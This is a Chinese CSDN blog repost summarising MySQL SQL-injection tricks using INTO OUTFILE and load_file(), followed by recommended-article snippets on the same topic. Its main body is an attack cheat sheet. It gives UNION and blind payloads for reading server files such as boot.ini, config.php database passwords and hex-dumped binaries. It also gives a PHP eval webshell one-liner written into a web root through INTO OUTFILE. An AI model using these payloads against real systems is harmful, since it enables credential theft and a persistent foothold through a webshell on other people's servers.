mysql注入 outfile_<转>Mysql注入中into outfile和load_file()总结

最新推荐文章于 2021-01-19 15:05:08 发布
最新推荐文章于 2021-01-19 15:05:08 发布
阅读量257 收藏
点赞数
文章标签: mysql注入 outfile
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39705435/article/details/113215780
版权

(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。

唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。

(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径中的斜杠是/而不是\。

一般用load_file来看config.php(即mysql的密码),apache配置、servu密码等。前提是要知道物理路径。

(3)load_file可以在union中作为一个字段来用。如union select 1,load_file('c:/boot.ini'),3,4 from ka_admin等。

(4)load_file可以在where字句中使用。如 and length(load_file(0x633A2F626F6F742E696E69))>1

(5)load_file文件的时候,特别是想看exe等含有二进制的00等截断或者回车 换行等特殊符号时,可以结合hex函数。如union select 1,hex(load_file('c:/windows/notepad.exe')),3 from xxxx,这样就不会存在截断了,也不会一会断行而截断。自己再用个工具或者几行代码转换回来就是了。

(6)outfile一句话(经典):select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

或者从表中

select * from a into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'

(7)关于mysql多语句:直接在mysql中,可以同时select中使用update或者insert,但是php注入中就不行,至少我测试的是php的函数mysql_query是不行。

weixin_39705435
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql注入的outfile、dumpfileload_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档的描述如下 翻译一下就是 其当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
mysql注入 outfile_Mysql注入的outfile、dumpfileload_file函数详解
weixin_42297439的博客
01-19 501
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其比较常用的函数有以下三个into dumpfile()into outfile()load_file()我们本次的测试数据如下读写文件函数调用的限制因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档的描述如下翻译一下...
MySQL INTO OUTFILE导出导入数据|mysqldump
u013358378的专栏
11-29 1002
--将刚刚导出的文件log1.txt导入到表log1相同结构的LOG2 点击(此处)折叠或打开 LOAD DATA INFILE 'C:\\log1.txt' INTO TABLE
mysql outfile 远程_mysql从远程数据库储到localhost outfile
weixin_29693211的博客
01-19 364
I'm stuck. I basically want to create a LOCAL data file (csv file) from a remote database using the OUTFILE command.I am basically, pulling data.. and want to create it on my local file server vs. cre...
Sqlilabs Less 7 Dump to outfile
baynk的博客
02-22 411
看到这个outfile就知道肯定是直接写webshell了,原来都是在phpmyadmin写的,现在用在网页写,而且路径啥的都不知道,估计要作弊了。。。 Less 7 GET-Dump into outfile-String 手工注入 先用普通手法试试,发现正常显示只有一句 You are in.... Use outfile......,构造错误语句的又没有提示哪错了。这种时候一般使用盲注比...
mysql.rar_MYSQL数据库开发、管理和维护。_mysql学习资料
09-24
3. 数据库导入导出:掌握使用LOAD DATA INFILE和SELECT ... INTO OUTFILE命令进行数据导入导出的方法。 4. 日志管理:了解错误日志、二进制日志和慢查询日志的作用,以及如何调整相关配置。 三、MySQL数据库维护 ...
mysql Load Data InFile 的用法
09-11
`LOAD DATA INFILE` 是 MySQL 数据库一种高效的数据导入工具,它允许用户从外部文本文件快速批量导入数据到数据库的表。相比于使用 `INSERT INTO` 语句逐条插入,`LOAD DATA INFILE` 在处理大量数据时速度显著更...
MySQL注入绕开过滤的技巧总结
09-09
- `LOAD_FILE()`和`INTO OUTFILE`是两个经常在SQL注入使用的函数,它们允许读取或写入文件。通过将恶意数据编码为十六进制并使用这些函数,攻击者可以绕过过滤并执行文件操作。 5. **理解过滤规则**: - 成功绕...
简易版 文件上传UpdateFile(Struts2版)
奔跑在路上
05-13 590
1.搭建环境 eclipase:Luna Release (4.4.0) struts2 :2.3.28  下载地址:http://download.csdn.net/detail/chuck_kui/9513090 2. 项目结构: 3. 类: Update.java package com.baidu.update; import java.io.File;
关于MYSQL into outfile注射
Quantum Intelligence
01-03 2056
其实网上已经有很多关于MYSQL注射的文章了~ 不过还是缺乏重点吧~ 要使用  into outfile 把代码写到web目录取得WEBSHELL  首先需要 3大先天条件①知道物理路径(into outfile 物理路径) 这样才能写对目录②能够使用union (也就是说需要MYSQL3以上的版本)③对方没有对’进行过滤(因为outfile 后面的 不可以用其他函数代替
mysql into outfile语法_用SELECT... INTO OUTFILE语句导出MySQL数据
weixin_33168937的博客
01-19 1705
表数据导出到一个文本文件最简单的方法是使用SELECT... INTO OUTFILE语句的查询结果直接导出到一个文件在服务器主机上。导出数据的SELECT...INTO OUTFILE声明:这句话的语法结合了常规的SELECT INTO OUTFILE文件名的末尾。默认的输出格式是相同的LOAD DATA,所以下面的语句导出tutorials_tbl的表制表符分隔的,换行结尾的文件到/tmp/t...
MySQL使用 INTO INFILE/OUTFILE导入导出数据
小猪佩奇工作室
01-23 1627
1.使用SELECT ... INTO OUTFILE 以逗号分隔的方式将数据导入到一个csv文件: SELECT * FROM table1 INTO OUTFILE 'usr/data/data1.csv' FIELDS TERMINATED BY ',' 2.将刚刚导出的文件data1.csv导入到表table1相同结构的table2: LOAD DATA INFILE 'usr
SQL注入--Load_file与into outfile
weixin_44940180的博客
08-09 2887
Load_file与into outfile 利用into outfile拿到getshall
phpmyadmin拿权限
kzyyx的博客
08-31 772
标题phpmyadmin拿权限 挺垃圾的一个网站通过弱口令root进入后台。 最主要还能直接直行根目录下phpinfo查看网站绝对路径。 1.首先尝试执行outfile语句写入一句话木马 报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。 这是secure_file_priv参数的说明。 2.执行show variables like “%secure%”; 查看配置 回显设置为NULL,没有做限制。暂时不知道原因,后续懂了做补
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
MySQL之select into outfile用法
cuiruidu3106的博客
08-09 2685
1、select into outfile可以导出数据到指定目录下的文件 语法: SELECT...INTOOUTFILE'file_name' [CHARACTERSET...
select into outfile问题一则
woqutechteam的博客
10-11 1282
01 背景 select into outfile无论对于开发或DBA来说,都是一个爱不释手的导出数据的方式。相比mysqldump,它能够对需要导出的字段做限制,很好的满足了某些不需要导出主键字段的场景或分库分表的环境下数据的重新导入。且与load data infile配合起来,无疑是一款数据导入导出的利器。最近,开发小伙伴在测试环境使用select into file进行数据导出时,碰...
mysql修改secure_file_priv
最新发布
05-26
secure_file_priv是MySQL的一个系统变量,用于限制LOAD DATA INFILE和SELECT ... INTO OUTFILE操作的文件读写权限。如果未设置secure_file_priv,则默认情况下,这些操作将被允许在任何目录读取和写入文件。 要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值